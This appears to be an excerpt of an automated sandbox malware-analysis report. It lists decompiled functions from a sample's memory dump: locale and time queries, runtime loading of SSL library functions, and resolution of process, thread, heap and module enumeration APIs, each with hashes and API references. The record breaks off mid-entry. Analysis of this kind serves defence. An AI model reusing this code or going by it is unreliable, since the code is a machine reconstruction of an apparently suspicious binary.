                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: fa02342401d94616f2e5bd42f4260c71efb65923d14809067b41eadbea591770
                                                    • Instruction ID: 80422fc4f260eb885d3d5276ce9bf4904eb24ae74d3e19530ef2a12f5b611188
                                                    • Opcode Fuzzy Hash: fa02342401d94616f2e5bd42f4260c71efb65923d14809067b41eadbea591770
                                                    • Instruction Fuzzy Hash: 1EF0F676B04214AFD700DF9AE881C96BBFCEB0D7203A140B7F908D7650D235AD009B74
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406AC6 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 51%
                                                    			E00406AC6(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x406b2e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00404C30( &_v20, 7,  &_v15);
				E004035F0(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00406B35);
				return E004049C0( &_v20);
			}








                                                    0x00406ad1
                                                    0x00406ad6
                                                    0x00406ad7
                                                    0x00406adc
                                                    0x00406adf
                                                    0x00406aee
                                                    0x00406afe
                                                    0x00406b09
                                                    0x00406b14
                                                    0x00406b14
                                                    0x00406b1a
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b2d

                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: e46581e8cdc3331be5097877ba1128faf35b36a3c95c951874e5d987cba23955
                                                    • Instruction ID: 1884f1ac99702eb7bfb6ab039d2c511877b7776afc39d63850cc4166923a2af7
                                                    • Opcode Fuzzy Hash: e46581e8cdc3331be5097877ba1128faf35b36a3c95c951874e5d987cba23955
                                                    • Instruction Fuzzy Hash: 99F02870A04319AFE714DFA2CC42AAEB3BAF7C4310F40857AB510F31C4E7B82A10C684
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426548 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00426548(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}











                                                    0x0042654e
                                                    0x00426551
                                                    0x00426554
                                                    0x00426558
                                                    0x0042655d
                                                    0x00426563
                                                    0x00426564
                                                    0x0042656e
                                                    0x00426581
                                                    0x0042658a
                                                    0x00426592
                                                    0x00426595
                                                    0x00426595
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00426570
                                                    0x00426570
                                                    0x00426573
                                                    0x00426575
                                                    0x00426578
                                                    0x0042657b
                                                    0x0042657b
                                                    0x00000000
                                                    0x00426570
                                                    0x0042659c

                                                    APIs
                                                    • GetSystemInfo.KERNEL32(?), ref: 00426558
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 5b59df6a4db17697c4621f1198143272915962c4c42650c0f147f9fc6234deed
                                                    • Instruction ID: 24291676ee62f313b8705277a049495d892b78a3fb7c7c66d6bc96e5edecc5e6
                                                    • Opcode Fuzzy Hash: 5b59df6a4db17697c4621f1198143272915962c4c42650c0f147f9fc6234deed
                                                    • Instruction Fuzzy Hash: BDF096B1E01119AFCB11DF98E48489DB7B4FB5A301B95429AD408DB342EB34A6D5C7C9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406AC8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 51%
                                                    			E00406AC8(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x406b2e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00404C30( &_v20, 7,  &_v15);
				E004035F0(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00406B35);
				return E004049C0( &_v20);
			}








                                                    0x00406ad1
                                                    0x00406ad6
                                                    0x00406ad7
                                                    0x00406adc
                                                    0x00406adf
                                                    0x00406aee
                                                    0x00406afe
                                                    0x00406b09
                                                    0x00406b14
                                                    0x00406b14
                                                    0x00406b1a
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b2d

                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 75c1d52228b281e4a2a8cbe05b9b26f6635f1fb66f4f138c8f1ad605eb8c8863
                                                    • Instruction ID: 8c46e58028a20f45c726cdf232f197f4d268d7d6409a4c5068237e5da40a84cb
                                                    • Opcode Fuzzy Hash: 75c1d52228b281e4a2a8cbe05b9b26f6635f1fb66f4f138c8f1ad605eb8c8863
                                                    • Instruction Fuzzy Hash: 80F0C871A04319AFE714DFA2CC42A9EB37AF7C4714F51857AA510B71D4E7B82610C684
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040C964 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040C964(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00404A14(_t10, _t18);
				}
				return E00404AB0(_t10, _t5 - 1,  &_v260, _t19);
			}







                                                    0x0040c96f
                                                    0x0040c971
                                                    0x0040c982
                                                    0x0040c987
                                                    0x0040c989
                                                    0x00000000
                                                    0x0040c9a1
                                                    0x00000000

                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 026571d56001ee72b0406f5d7f97dc349247158a98ed82025b723c8338f8d56e
                                                    • Instruction ID: c55d8128e0464d7f0ffda61b66ea8af477aea0d032980e5ba508f3227b3018b3
                                                    • Opcode Fuzzy Hash: 026571d56001ee72b0406f5d7f97dc349247158a98ed82025b723c8338f8d56e
                                                    • Instruction Fuzzy Hash: 07E092B271421457D314A6695C869EA725C9798310F00427FBA49E73C2EDB89D4446ED
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040C9B0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0040C9B0(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






                                                    0x0040c9b3
                                                    0x0040c9b4
                                                    0x0040c9ca
                                                    0x0040c9d1
                                                    0x0040c9cc
                                                    0x0040c9cc
                                                    0x0040c9cc
                                                    0x0040c9d7

                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040E39A,00000000,0040E5B3,?,?,00000000,00000000), ref: 0040C9C3
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 5d8534821ffc97822e41bd311946462fda5bd873699444b04a03bff573cbe2e9
                                                    • Instruction ID: 274c397104c08bcef1503af243249226e7c8b6f68a7688c9cfeef2f5654669c9
                                                    • Opcode Fuzzy Hash: 5d8534821ffc97822e41bd311946462fda5bd873699444b04a03bff573cbe2e9
                                                    • Instruction Fuzzy Hash: 98D05EA630E2546AE214525A2D85DBB5AACCAC57B1F10423FF988E7281D2248C0693BA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040B2D4 Relevance: 1.5, APIs: 1, Instructions: 13timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0040B2D4(long long __fp0) {
				struct _SYSTEMTIME _v16;
				void* _t7;
				long long* _t10;
				void* _t11;
				long long _t12;

				_t12 = __fp0;
				GetLocalTime( &_v16);
				_t7 = E0040B110(_v16.wYear, _v16.wDay, _v16.wMonth, _t11, __fp0);
				 *_t10 = _t12;
				asm("wait");
				return _t7;
			}








                                                    0x0040b2d4
                                                    0x0040b2dc
                                                    0x0040b2f0
                                                    0x0040b2f5
                                                    0x0040b2f8
                                                    0x0040b2ff

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID:
                                                    • API String ID: 481472006-0
                                                    • Opcode ID: 5d4b386aad8b6fd01d40aa064b90e864029cd9eaca585b2295d799d1887da282
                                                    • Instruction ID: a3b185b344278dcf1c9439e42592f718bf33603f87ac91d23c0fcb87781d4dc0
                                                    • Opcode Fuzzy Hash: 5d4b386aad8b6fd01d40aa064b90e864029cd9eaca585b2295d799d1887da282
                                                    • Instruction Fuzzy Hash: 71D09E28409505A1C2007B15C85549FB7A4EE84740F808D5DF4D856391EB358595C79B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004906B8 Relevance: 142.1, APIs: 2, Strings: 79, Instructions: 395libraryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004906B8() {
				void* __ebx;
				void* _t158;

				_t158 = 1;
				if( *0x49d588 == 0) {
					 *0x49d588 = LoadLibraryA("libeay32.dll");
				}
				_t160 =  *0x49d584;
				if( *0x49d584 == 0) {
					 *0x49d584 = LoadLibraryA("ssleay32.dll");
					 *0x49d454 = E0049058C("SSL_CTX_set_cipher_list", _t158);
					 *0x49d458 = E0049058C("SSL_CTX_new", _t158);
					 *0x49d45c = E0049058C("SSL_CTX_free", _t158);
					 *0x49d460 = E0049058C("SSL_set_fd", _t158);
					 *0x49d464 = E0049058C("SSL_CTX_use_PrivateKey_file", _t158);
					 *0x49d468 = E0049058C("SSL_CTX_use_certificate_file", _t158);
					 *0x49d46c = E0049058C("SSL_load_error_strings", _t158);
					 *0x49d470 = E0049058C("SSL_state_string_long", _t158);
					 *0x49d474 = E0049058C("SSL_get_peer_certificate", _t158);
					 *0x49d478 = E0049058C("SSL_CTX_set_verify", _t158);
					 *0x49d47c = E0049058C("SSL_CTX_set_verify_depth", _t158);
					 *0x49d480 = E0049058C("SSL_CTX_get_verify_depth", _t158);
					 *0x49d484 = E0049058C("SSL_CTX_set_default_passwd_cb", _t158);
					 *0x49d488 = E0049058C("SSL_CTX_set_default_passwd_cb_userdata", _t158);
					 *0x49d48c = E0049058C("SSL_CTX_check_private_key", _t158);
					 *0x49d490 = E0049058C("SSL_new", _t158);
					 *0x49d494 = E0049058C("SSL_free", _t158);
					 *0x49d498 = E0049058C("SSL_accept", _t158);
					 *0x49d49c = E0049058C("SSL_connect", _t158);
					 *0x49d4a0 = E0049058C("SSL_read", _t158);
					 *0x49d4a4 = E0049058C("SSL_peek", _t158);
					 *0x49d4a8 = E0049058C("SSL_write", _t158);
					 *0x49d4ac = E0049058C("SSL_get_error", _t158);
					 *0x49d4b0 = E0049058C("SSLv2_method", _t158);
					 *0x49d4b4 = E0049058C("SSLv2_server_method", _t158);
					 *0x49d4b8 = E0049058C("SSLv2_client_method", _t158);
					 *0x49d4bc = E0049058C("SSLv3_method", _t158);
					 *0x49d4c0 = E0049058C("SSLv3_server_method", _t158);
					 *0x49d4c4 = E0049058C("SSLv3_client_method", _t158);
					 *0x49d4c8 = E0049058C("SSLv23_method", _t158);
					 *0x49d4cc = E0049058C("SSLv23_server_method", _t158);
					 *0x49d4d0 = E0049058C("SSLv23_client_method", _t158);
					 *0x49d4d4 = E0049058C("TLSv1_method", _t158);
					 *0x49d4d8 = E0049058C("TLSv1_server_method", _t158);
					 *0x49d4dc = E0049058C("TLSv1_client_method", _t158);
					 *0x49d4e0 = E0049058C("SSL_shutdown", _t158);
					 *0x49d4e4 = E0049058C("SSL_set_connect_state", _t158);
					 *0x49d4e8 = E0049058C("SSL_set_accept_state", _t158);
					 *0x49d4ec = E0049058C("SSL_set_shutdown", _t158);
					 *0x49d4f0 = E0049058C("SSL_CTX_load_verify_locations", _t158);
					 *0x49d4f4 = E0049058C("SSL_get_session", _t158);
					 *0x49d4f8 = E0049058C("SSL_library_init", _t158);
					 *0x49d4fc = E004905FC("SSL_CTX_set_info_callback_indy", _t158, _t160);
					 *0x49d500 = E004905FC("X509_STORE_CTX_get_app_data_indy", _t158, _t160);
					 *0x49d504 = E004905FC("SSL_SESSION_get_id_indy", _t158, _t160);
					 *0x49d508 = E004905FC("SSL_SESSION_get_id_ctx_indy", _t158, _t160);
					 *0x49d50c = E004905FC("SSL_CTX_get_version_indy", _t158, _t160);
					 *0x49d510 = E004905FC("SSL_CTX_set_options_indy", _t158, _t160);
					 *0x49d514 = E00490648("X509_NAME_oneline", _t158);
					 *0x49d518 = E0049058C("X509_NAME_hash", _t158);
					 *0x49d51c = E00490648("X509_set_issuer_name", _t158);
					 *0x49d520 = E00490648("X509_get_issuer_name", _t158);
					 *0x49d524 = E00490648("X509_set_subject_name", _t158);
					 *0x49d528 = E00490648("X509_get_subject_name", _t158);
					 *0x49d52c = E0049058C("X509_digest", _t158);
					 *0x49d530 = E0049058C("EVP_md5", _t158);
					 *0x49d534 = E004905FC("X509_get_notBefore_indy", _t158, _t160);
					 *0x49d538 = E004905FC("X509_get_notAfter_indy", _t158, _t160);
					 *0x49d53c = E00490648("X509_STORE_CTX_get_error", _t158);
					 *0x49d540 = E00490648("X509_STORE_CTX_set_error", _t158);
					 *0x49d544 = E00490648("X509_STORE_CTX_get_error_depth", _t158);
					 *0x49d548 = E00490648("X509_STORE_CTX_get_current_cert", _t158);
					 *0x49d590 = E00490648("RAND_screen", _t158);
					 *0x49d54c = E00490648("des_set_odd_parity", _t158);
					 *0x49d550 = E00490648("des_set_key", _t158);
					 *0x49d554 = E00490648("des_ecb_encrypt", _t158);
					 *0x49d558 = E0049058C("SSL_set_ex_data", _t158);
					 *0x49d55c = E0049058C("SSL_get_ex_data", _t158);
					 *0x49d560 = E0049058C("SSL_load_client_CA_file", _t158);
					 *0x49d564 = E0049058C("SSL_CTX_set_client_CA_list", _t158);
					 *0x49d568 = E0049058C("SSL_CTX_set_default_verify_paths", _t158);
					 *0x49d56c = E0049058C("SSL_CTX_set_session_id_context", _t158);
					 *0x49d570 = E0049058C("SSL_CIPHER_description", _t158);
					 *0x49d574 = E0049058C("SSL_get_current_cipher", _t158);
					 *0x49d578 = E0049058C("SSL_CIPHER_get_name", _t158);
					 *0x49d57c = E0049058C("SSL_CIPHER_get_version", _t158);
					 *0x49d580 = E0049058C("SSL_CIPHER_get_bits", _t158);
					if( *0x49d454 == 0 ||  *0x49d458 == 0 ||  *0x49d45c == 0 ||  *0x49d460 == 0 ||  *0x49d464 == 0 ||  *0x49d468 == 0 ||  *0x49d46c == 0 ||  *0x49d470 == 0 ||  *0x49d474 == 0 ||  *0x49d478 == 0 ||  *0x49d484 == 0 ||  *0x49d488 == 0 ||  *0x49d48c == 0 ||  *0x49d490 == 0 ||  *0x49d494 == 0 ||  *0x49d498 == 0 ||  *0x49d49c == 0 ||  *0x49d4a0 == 0 ||  *0x49d4a4 == 0 ||  *0x49d4a8 == 0 ||  *0x49d4ac == 0 ||  *0x49d4b0 == 0 ||  *0x49d4b4 == 0 ||  *0x49d4b8 == 0 ||  *0x49d4bc == 0 ||  *0x49d4c0 == 0 ||  *0x49d4c4 == 0 ||  *0x49d4c8 == 0 ||  *0x49d4cc == 0 ||  *0x49d4d0 == 0 ||  *0x49d4d4 == 0 ||  *0x49d4d8 == 0 ||  *0x49d4dc == 0 ||  *0x49d4e0 == 0 ||  *0x49d4e4 == 0 ||  *0x49d4e8 == 0 ||  *0x49d4ec == 0 ||  *0x49d4f0 == 0 ||  *0x49d4f4 == 0 ||  *0x49d4f8 == 0 ||  *0x49d4fc == 0 ||  *0x49d500 == 0 ||  *0x49d504 == 0 ||  *0x49d508 == 0 ||  *0x49d50c == 0 ||  *0x49d510 == 0 ||  *0x49d514 == 0 ||  *0x49d51c == 0 ||  *0x49d520 == 0 ||  *0x49d524 == 0 ||  *0x49d528 == 0 ||  *0x49d534 == 0 ||  *0x49d538 == 0 ||  *0x49d53c == 0 ||  *0x49d540 == 0 ||  *0x49d544 == 0 ||  *0x49d548 == 0 ||  *0x49d54c == 0 ||  *0x49d550 == 0 ||  *0x49d554 == 0 ||  *0x49d558 == 0 ||  *0x49d55c == 0 ||  *0x49d47c == 0 ||  *0x49d480 == 0 ||  *0x49d560 == 0 ||  *0x49d564 == 0 ||  *0x49d568 == 0 ||  *0x49d56c == 0 ||  *0x49d570 == 0 ||  *0x49d574 == 0 ||  *0x49d578 == 0 ||  *0x49d580 == 0 ||  *0x49d57c == 0) {
						_t158 = 0;
					} else {
						_t158 = 1;
					}
				}
				return _t158;
			}





                                                    0x004906b9
                                                    0x004906c2
                                                    0x004906ce
                                                    0x004906ce
                                                    0x004906d3
                                                    0x004906da
                                                    0x004906ea
                                                    0x004906f9
                                                    0x00490708
                                                    0x00490717
                                                    0x00490726
                                                    0x00490735
                                                    0x00490744
                                                    0x00490753
                                                    0x00490762
                                                    0x00490771
                                                    0x00490780
                                                    0x0049078f
                                                    0x0049079e
                                                    0x004907ad
                                                    0x004907bc
                                                    0x004907cb
                                                    0x004907da
                                                    0x004907e9
                                                    0x004907f8
                                                    0x00490807
                                                    0x00490816
                                                    0x00490825
                                                    0x00490834
                                                    0x00490843
                                                    0x00490852
                                                    0x00490861
                                                    0x00490870
                                                    0x0049087f
                                                    0x0049088e
                                                    0x0049089d
                                                    0x004908ac
                                                    0x004908bb
                                                    0x004908ca
                                                    0x004908d9
                                                    0x004908e8
                                                    0x004908f7
                                                    0x00490906
                                                    0x00490915
                                                    0x00490924
                                                    0x00490933
                                                    0x00490942
                                                    0x00490951
                                                    0x00490960
                                                    0x0049096f
                                                    0x0049097e
                                                    0x0049098d
                                                    0x0049099c
                                                    0x004909ab
                                                    0x004909ba
                                                    0x004909c9
                                                    0x004909d8
                                                    0x004909e7
                                                    0x004909f6
                                                    0x00490a05
                                                    0x00490a14
                                                    0x00490a23
                                                    0x00490a32
                                                    0x00490a41
                                                    0x00490a50
                                                    0x00490a5f
                                                    0x00490a6e
                                                    0x00490a7d
                                                    0x00490a8c
                                                    0x00490a9b
                                                    0x00490aaa
                                                    0x00490ab9
                                                    0x00490ac8
                                                    0x00490ad7
                                                    0x00490ae6
                                                    0x00490af5
                                                    0x00490b04
                                                    0x00490b13
                                                    0x00490b22
                                                    0x00490b31
                                                    0x00490b40
                                                    0x00490b4f
                                                    0x00490b5e
                                                    0x00490b6d
                                                    0x00490b79
                                                    0x00490eeb
                                                    0x00490eef
                                                    0x00490eef
                                                    0x00490eef
                                                    0x00490b79
                                                    0x00490ef4

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(libeay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906C9
                                                      • Part of subcall function 0049058C: GetProcAddress.KERNEL32(00000000,00000000), ref: 004905C6
                                                      • Part of subcall function 00490648: GetProcAddress.KERNEL32(00000000,00000000), ref: 00490682
                                                    • LoadLibraryA.KERNEL32(ssleay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: EVP_md5$RAND_screen$SSL_CIPHER_description$SSL_CIPHER_get_bits$SSL_CIPHER_get_name$SSL_CIPHER_get_version$SSL_CTX_check_private_key$SSL_CTX_free$SSL_CTX_get_verify_depth$SSL_CTX_get_version_indy$SSL_CTX_load_verify_locations$SSL_CTX_new$SSL_CTX_set_cipher_list$SSL_CTX_set_client_CA_list$SSL_CTX_set_default_passwd_cb$SSL_CTX_set_default_passwd_cb_userdata$SSL_CTX_set_default_verify_paths$SSL_CTX_set_info_callback_indy$SSL_CTX_set_options_indy$SSL_CTX_set_session_id_context$SSL_CTX_set_verify$SSL_CTX_set_verify_depth$SSL_CTX_use_PrivateKey_file$SSL_CTX_use_certificate_file$SSL_SESSION_get_id_ctx_indy$SSL_SESSION_get_id_indy$SSL_accept$SSL_connect$SSL_free$SSL_get_current_cipher$SSL_get_error$SSL_get_ex_data$SSL_get_peer_certificate$SSL_get_session$SSL_library_init$SSL_load_client_CA_file$SSL_load_error_strings$SSL_new$SSL_peek$SSL_read$SSL_set_accept_state$SSL_set_connect_state$SSL_set_ex_data$SSL_set_fd$SSL_set_shutdown$SSL_shutdown$SSL_state_string_long$SSL_write$SSLv23_client_method$SSLv23_method$SSLv23_server_method$SSLv2_client_method$SSLv2_method$SSLv2_server_method$SSLv3_client_method$SSLv3_method$SSLv3_server_method$TLSv1_client_method$TLSv1_method$TLSv1_server_method$X509_NAME_hash$X509_NAME_oneline$X509_STORE_CTX_get_app_data_indy$X509_STORE_CTX_get_current_cert$X509_STORE_CTX_get_error$X509_STORE_CTX_get_error_depth$X509_STORE_CTX_set_error$X509_digest$X509_get_issuer_name$X509_get_notAfter_indy$X509_get_notBefore_indy$X509_get_subject_name$X509_set_issuer_name$X509_set_subject_name$des_ecb_encrypt$des_set_key$des_set_odd_parity$libeay32.dll$ssleay32.dll
                                                    • API String ID: 2574300362-3914122982
                                                    • Opcode ID: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                    • Instruction ID: 3fc9e01923c26730d663d19a2b901ff2da1ed37202cb3e817e08d019f5698bc5
                                                    • Opcode Fuzzy Hash: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                    • Instruction Fuzzy Hash: 9202C874D00205AEDF75EB6DA90935A3EA1E76432DF06443BA908C72B1D77C9884CF9E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004728A4 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004728A4() {

				if( *0x49ebf4 == 0) {
					 *0x49ebf4 = GetModuleHandleA("kernel32.dll");
					if( *0x49ebf4 != 0) {
						 *0x49ebf8 = GetProcAddress( *0x49ebf4, "CreateToolhelp32Snapshot");
						 *0x49ebfc = GetProcAddress( *0x49ebf4, "Heap32ListFirst");
						 *0x49ec00 = GetProcAddress( *0x49ebf4, "Heap32ListNext");
						 *0x49ec04 = GetProcAddress( *0x49ebf4, "Heap32First");
						 *0x49ec08 = GetProcAddress( *0x49ebf4, "Heap32Next");
						 *0x49ec0c = GetProcAddress( *0x49ebf4, "Toolhelp32ReadProcessMemory");
						 *0x49ec10 = GetProcAddress( *0x49ebf4, "Process32First");
						 *0x49ec14 = GetProcAddress( *0x49ebf4, "Process32Next");
						 *0x49ec18 = GetProcAddress( *0x49ebf4, "Process32FirstW");
						 *0x49ec1c = GetProcAddress( *0x49ebf4, "Process32NextW");
						 *0x49ec20 = GetProcAddress( *0x49ebf4, "Thread32First");
						 *0x49ec24 = GetProcAddress( *0x49ebf4, "Thread32Next");
						 *0x49ec28 = GetProcAddress( *0x49ebf4, "Module32First");
						 *0x49ec2c = GetProcAddress( *0x49ebf4, "Module32Next");
						 *0x49ec30 = GetProcAddress( *0x49ebf4, "Module32FirstW");
						 *0x49ec34 = GetProcAddress( *0x49ebf4, "Module32NextW");
					}
				}
				if( *0x49ebf4 == 0 ||  *0x49ebf8 == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                                    0x004728ad
                                                    0x004728bd
                                                    0x004728c2
                                                    0x004728d5
                                                    0x004728e7
                                                    0x004728f9
                                                    0x0047290b
                                                    0x0047291d
                                                    0x0047292f
                                                    0x00472941
                                                    0x00472953
                                                    0x00472965
                                                    0x00472977
                                                    0x00472989
                                                    0x0047299b
                                                    0x004729ad
                                                    0x004729bf
                                                    0x004729d1
                                                    0x004729e3
                                                    0x004729e3
                                                    0x004728c2
                                                    0x004729eb
                                                    0x004729f9
                                                    0x004729fa
                                                    0x004729fd
                                                    0x004729fd

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00472B2B,?,?,00475AEA,00000000,00475BD5), ref: 004728B8
                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004728D0
                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004728E2
                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004728F4
                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00472906
                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00472918
                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0047292A
                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0047293C
                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0047294E
                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00472960
                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00472972
                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00472984
                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00472996
                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004729A8
                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004729BA
                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004729CC
                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004729DE
                                                    Strings
                                                    Memory Dump Source
